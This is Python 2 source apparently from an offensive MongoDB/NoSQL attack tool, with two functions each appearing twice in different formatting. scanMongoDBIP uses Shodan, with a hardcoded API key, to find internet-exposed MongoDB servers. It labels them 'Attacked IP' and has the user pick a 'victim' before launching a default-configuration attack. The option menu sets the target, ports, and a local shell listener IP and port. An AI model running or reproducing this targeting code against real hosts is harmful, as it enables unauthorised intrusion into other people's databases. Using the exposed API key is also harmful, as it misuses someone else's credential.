def scanMongoDBIP(): SHODAN_API_KEY = "9kwHl4vdqoXjeKl7iXOHMvXGT3ny85Ig" api = shodan.Shodan(SHODAN_API_KEY) print 'Start Scanning.....' try: results = api.search('mongoDB') # print 'Results found:%s' % results['total'] for index in range(1, 10): print str(index) + '_Attacked IP : %s' % results['matches'][index][ 'ip_str'] # select = raw_input("Get more IP (y/n)?") select = raw_input("Select IP to attack:") GlobalVar.set_victim(results['matches'][int(select)]['ip_str']) GlobalVar.set_optionSet(0, True) GlobalVar.set_myIP('127.0.0.1') GlobalVar.set_optionSet(4, True) start = raw_input("Start Default Configuration Attack(y/n)?") if start == 'y': netAttacks(GlobalVar.get_victim(), GlobalVar.get_dbPort(), GlobalVar.get_myIP(), GlobalVar.get_myPort()) # for result in results['matches']: # print 'Attacked IP: %s' % result['ip_str'] #print result['data'] #print 'hostnames:' % result['hostnames']; #print ' ' except shodan.APIError, e: print 'Error:%s' % e
def scanMongoDBIP(): SHODAN_API_KEY = "9kwHl4vdqoXjeKl7iXOHMvXGT3ny85Ig"; api = shodan.Shodan(SHODAN_API_KEY); print 'Start Scanning.....' try: results = api.search('mongoDB') # print 'Results found:%s' % results['total'] for index in range(1,10): print str(index)+'_Attacked IP : %s' % results['matches'][index]['ip_str'] # select = raw_input("Get more IP (y/n)?") select = raw_input("Select IP to attack:") GlobalVar.set_victim(results['matches'][int(select)]['ip_str']) GlobalVar.set_optionSet(0, True) GlobalVar.set_myIP('127.0.0.1') GlobalVar.set_optionSet(4, True) start = raw_input("Start Default Configuration Attack(y/n)?") if start == 'y': netAttacks(GlobalVar.get_victim(), GlobalVar.get_dbPort(), GlobalVar.get_myIP(), GlobalVar.get_myPort()) # for result in results['matches']: # print 'Attacked IP: %s' % result['ip_str'] #print result['data'] #print 'hostnames:' % result['hostnames']; #print ' ' except shodan.APIError, e: print 'Error:%s' % e
def option(): ''' global victim global webPort global uri global https https = 1 global platform global httpMethod global postData global myIP global myPort global verb global mmSelect global dbPort global requestHeaders# global optionSet optionSet = [False]*9 # GlobalVar.set_optionSet(0,True); # print GlobalVar.get_optionSet(0); requestHeaders = {} ''' optSelect = True #print "test" if GlobalVar.get_optionSet(0) == False: # if optionSet[0] == False: GlobalVar.set_victim("Not Set") if GlobalVar.get_optionSet(1) == False: GlobalVar.set_webPort(80) GlobalVar.set_optionSet(1,True) if GlobalVar.get_optionSet(2) == False: #Set App Path (Current: Not Set) GlobalVar.set_url("Not Set") if GlobalVar.get_optionSet(3) == False: GlobalVar.set_httpMethod("GET") if GlobalVar.get_optionSet(4) == False: GlobalVar.set_myIP("127.0.0.1") GlobalVar.set_optionSet(4, True) if GlobalVar.get_optionSet(5) == False: GlobalVar.set_myPort("Not Set") if GlobalVar.get_optionSet(6) == False: GlobalVar.set_verb("OFF") if GlobalVar.get_optionSet(8) == False: GlobalVar.set_https("OFF") GlobalVar.set_optionSet(8, True) while optSelect: print "\n\n" print "Options" print "1-Set target host/IP (Current: " + str(GlobalVar.get_victim()) + ")" print "2-Set web app port (Current: " + str(GlobalVar.get_webPort()) + ")" print "3-Set App Path (Current: " + str(GlobalVar.get_url()) + ")" print "4-Toggle HTTPS (Current: " + str(GlobalVar.get_https()) + ")" # set http or https print "5-Set " + GlobalVar.get_platform() + " Port (Current : " + str(GlobalVar.get_dbPort()) + ")" print "6-Set HTTP Request Method (GET/POST) (Current: " + GlobalVar.get_httpMethod() + ")" print "7-Set my local " + GlobalVar.get_platform() + "/Shell IP (Current: " + str(GlobalVar.get_myIP()) + ")" print "8-Set shell listener port (Current: " + str(GlobalVar.get_myPort()) + ")" print "9-Toggle Verbose Mode: (Current: " + str(GlobalVar.get_verb()) + ")" # more detail infor while attacking print "x-Back to main menu" select = raw_input("Set an option:") if select == '1': # optionSet[0] = False GlobalVar.set_optionSet(0,False) #if reset host ip, optionSet[0] should be false again while GlobalVar.get_optionSet(0) == False: notDNS = True goodDigits = True victim = raw_input("Enter host or IP/DNS name:") octets = victim.split(".") if len(octets) != 4: GlobalVar.set_optionSet(0,False) notDNS = False else: for item in octets: try: if int(item)<0 or int(item)>255: print "Bad octets in IP address." goodDigits = False except: notDNS = False if goodDigits == True or notDNS == False: print "\nTarget set to:" + victim + "\n" GlobalVar.set_victim(victim) GlobalVar.set_optionSet(0,True) elif select == '3': url = raw_input("Enter URL path(Press enter for no URL):") print "\nHTTP port set to " + str(GlobalVar.get_webPort()) + "\n" GlobalVar.set_optionSet(2,True) GlobalVar.set_url(url) elif select == '7': GlobalVar.set_optionSet(4,False) while GlobalVar.get_optionSet(4) == False: goodLen = False goodDigits = True myIP = raw_input("Enter host IP for my "+ GlobalVar.get_platform() +"/Shells:") octets = myIP.split(".") if len(octets) != 4: print "Invalid IP length." else: goodLen = True for item in octets: try: if int(item)<0 or int(item)>255: print "Bad octets in IP address." goodDigits = False except: goodDigits = False if goodDigits == True and goodLen == True: print "\nShell/DB listener set to "+ myIP +"\n" GlobalVar.set_myIP(myIP) GlobalVar.set_optionSet(4,True) elif select == "9": if GlobalVar.get_verb() == "OFF": print "Verbose output enabled." GlobalVar.set_verb("ON") GlobalVar.set_optionSet(6,True) elif GlobalVar.get_verb() == "ON": print "Verbose output disabled." GlobalVar.set_verb("OFF") GlobalVar.set_optionSet(6, True) elif select == 'x': return
def option(): ''' global victim global webPort global uri global https https = 1 global platform global httpMethod global postData global myIP global myPort global verb global mmSelect global dbPort global requestHeaders# global optionSet optionSet = [False]*9 # GlobalVar.set_optionSet(0,True); # print GlobalVar.get_optionSet(0); requestHeaders = {} ''' optSelect = True #print "test" if GlobalVar.get_optionSet(0) == False: # if optionSet[0] == False: GlobalVar.set_victim("Not Set") if GlobalVar.get_optionSet(1) == False: GlobalVar.set_webPort(80) GlobalVar.set_optionSet(1, True) if GlobalVar.get_optionSet(2) == False: #Set App Path (Current: Not Set) GlobalVar.set_url("Not Set") if GlobalVar.get_optionSet(3) == False: GlobalVar.set_httpMethod("GET") if GlobalVar.get_optionSet(4) == False: GlobalVar.set_myIP("127.0.0.1") GlobalVar.set_optionSet(4, True) if GlobalVar.get_optionSet(5) == False: GlobalVar.set_myPort("Not Set") if GlobalVar.get_optionSet(6) == False: GlobalVar.set_verb("OFF") if GlobalVar.get_optionSet(8) == False: GlobalVar.set_https("OFF") GlobalVar.set_optionSet(8, True) while optSelect: print "\n\n" print "Options" print "1-Set target host/IP (Current: " + str( GlobalVar.get_victim()) + ")" print "2-Set web app port (Current: " + str( GlobalVar.get_webPort()) + ")" print "3-Set App Path (Current: " + str(GlobalVar.get_url()) + ")" print "4-Toggle HTTPS (Current: " + str( GlobalVar.get_https()) + ")" # set http or https print "5-Set " + GlobalVar.get_platform() + " Port (Current : " + str( GlobalVar.get_dbPort()) + ")" print "6-Set HTTP Request Method (GET/POST) (Current: " + GlobalVar.get_httpMethod( ) + ")" print "7-Set my local " + GlobalVar.get_platform( ) + "/Shell IP (Current: " + str(GlobalVar.get_myIP()) + ")" print "8-Set shell listener port (Current: " + str( GlobalVar.get_myPort()) + ")" print "9-Toggle Verbose Mode: (Current: " + str( GlobalVar.get_verb()) + ")" # more detail infor while attacking print "x-Back to main menu" select = raw_input("Set an option:") if select == '1': # optionSet[0] = False GlobalVar.set_optionSet( 0, False) #if reset host ip, optionSet[0] should be false again while GlobalVar.get_optionSet(0) == False: notDNS = True goodDigits = True victim = raw_input("Enter host or IP/DNS name:") octets = victim.split(".") if len(octets) != 4: GlobalVar.set_optionSet(0, False) notDNS = False else: for item in octets: try: if int(item) < 0 or int(item) > 255: print "Bad octets in IP address." goodDigits = False except: notDNS = False if goodDigits == True or notDNS == False: print "\nTarget set to:" + victim + "\n" GlobalVar.set_victim(victim) GlobalVar.set_optionSet(0, True) elif select == '3': url = raw_input("Enter URL path(Press enter for no URL):") print "\nHTTP port set to " + str(GlobalVar.get_webPort()) + "\n" GlobalVar.set_optionSet(2, True) GlobalVar.set_url(url) elif select == '7': GlobalVar.set_optionSet(4, False) while GlobalVar.get_optionSet(4) == False: goodLen = False goodDigits = True myIP = raw_input("Enter host IP for my " + GlobalVar.get_platform() + "/Shells:") octets = myIP.split(".") if len(octets) != 4: print "Invalid IP length." else: goodLen = True for item in octets: try: if int(item) < 0 or int(item) > 255: print "Bad octets in IP address." goodDigits = False except: goodDigits = False if goodDigits == True and goodLen == True: print "\nShell/DB listener set to " + myIP + "\n" GlobalVar.set_myIP(myIP) GlobalVar.set_optionSet(4, True) elif select == "9": if GlobalVar.get_verb() == "OFF": print "Verbose output enabled." GlobalVar.set_verb("ON") GlobalVar.set_optionSet(6, True) elif GlobalVar.get_verb() == "ON": print "Verbose output disabled." GlobalVar.set_verb("OFF") GlobalVar.set_optionSet(6, True) elif select == 'x': return